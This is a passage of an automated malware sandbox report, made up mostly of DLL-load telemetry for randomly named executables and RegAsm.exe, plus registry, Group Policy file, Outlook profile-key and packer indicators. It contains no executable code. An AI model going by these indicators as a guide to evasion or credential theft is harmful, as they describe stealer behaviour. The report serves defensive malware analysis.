Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: shfolder.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: wldp.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: profapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: riched20.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: usp10.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: msls31.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: textshaping.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: edputil.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: netutils.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: slc.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: sppc.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe	Section loaded: msimg32.dll
Source: C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe	Section loaded: msimg32.dll
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: wldp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: propsys.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: profapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: ntshrui.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Section loaded: cscapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: d3d11.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: dxgi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: dxcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: wininet.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: devobj.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: webio.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: winnsi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: schannel.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: wldp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: dpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: profapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: netutils.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: propsys.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: edputil.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: slc.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: userenv.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: sppc.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: opcservices.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: esdsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: scrrun.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Section loaded: riched20.dll

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EA502722-A23D-11D1-A7D3-0000F87571E3}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

File written: C:\Windows\System32\GroupPolicy\gpt.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp

Window found: window name: TMainForm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: WlCIinu0yp.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: WlCIinu0yp.exe

Static file information: File size 5740032 > 1048576

Source: WlCIinu0yp.exe

Static PE information: Raw size of .themida is bigger than: 0x100000 < 0x4b0000

Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: WlCIinu0yp.exe
Source:	Binary string: C:\Users\weckb\source\repos\Hider\Hider\obj\x64\Release\Hider.pdb source: ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000000.1909451075.000001C579D82000.00000002.00000001.01000000.00000007.sdmp, ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000002.2953053052.000001C57C160000.00000002.00000001.00040000.00000007.sdmp
Source:	Binary string: D:\Work\_\QtAV\QtAV-Desktop_Qt_5_15_1_MSVC2019_64bit\lib_win_x86_64\QtAVWidgets1.pdb++ source: is-280SC.tmp.25.dr
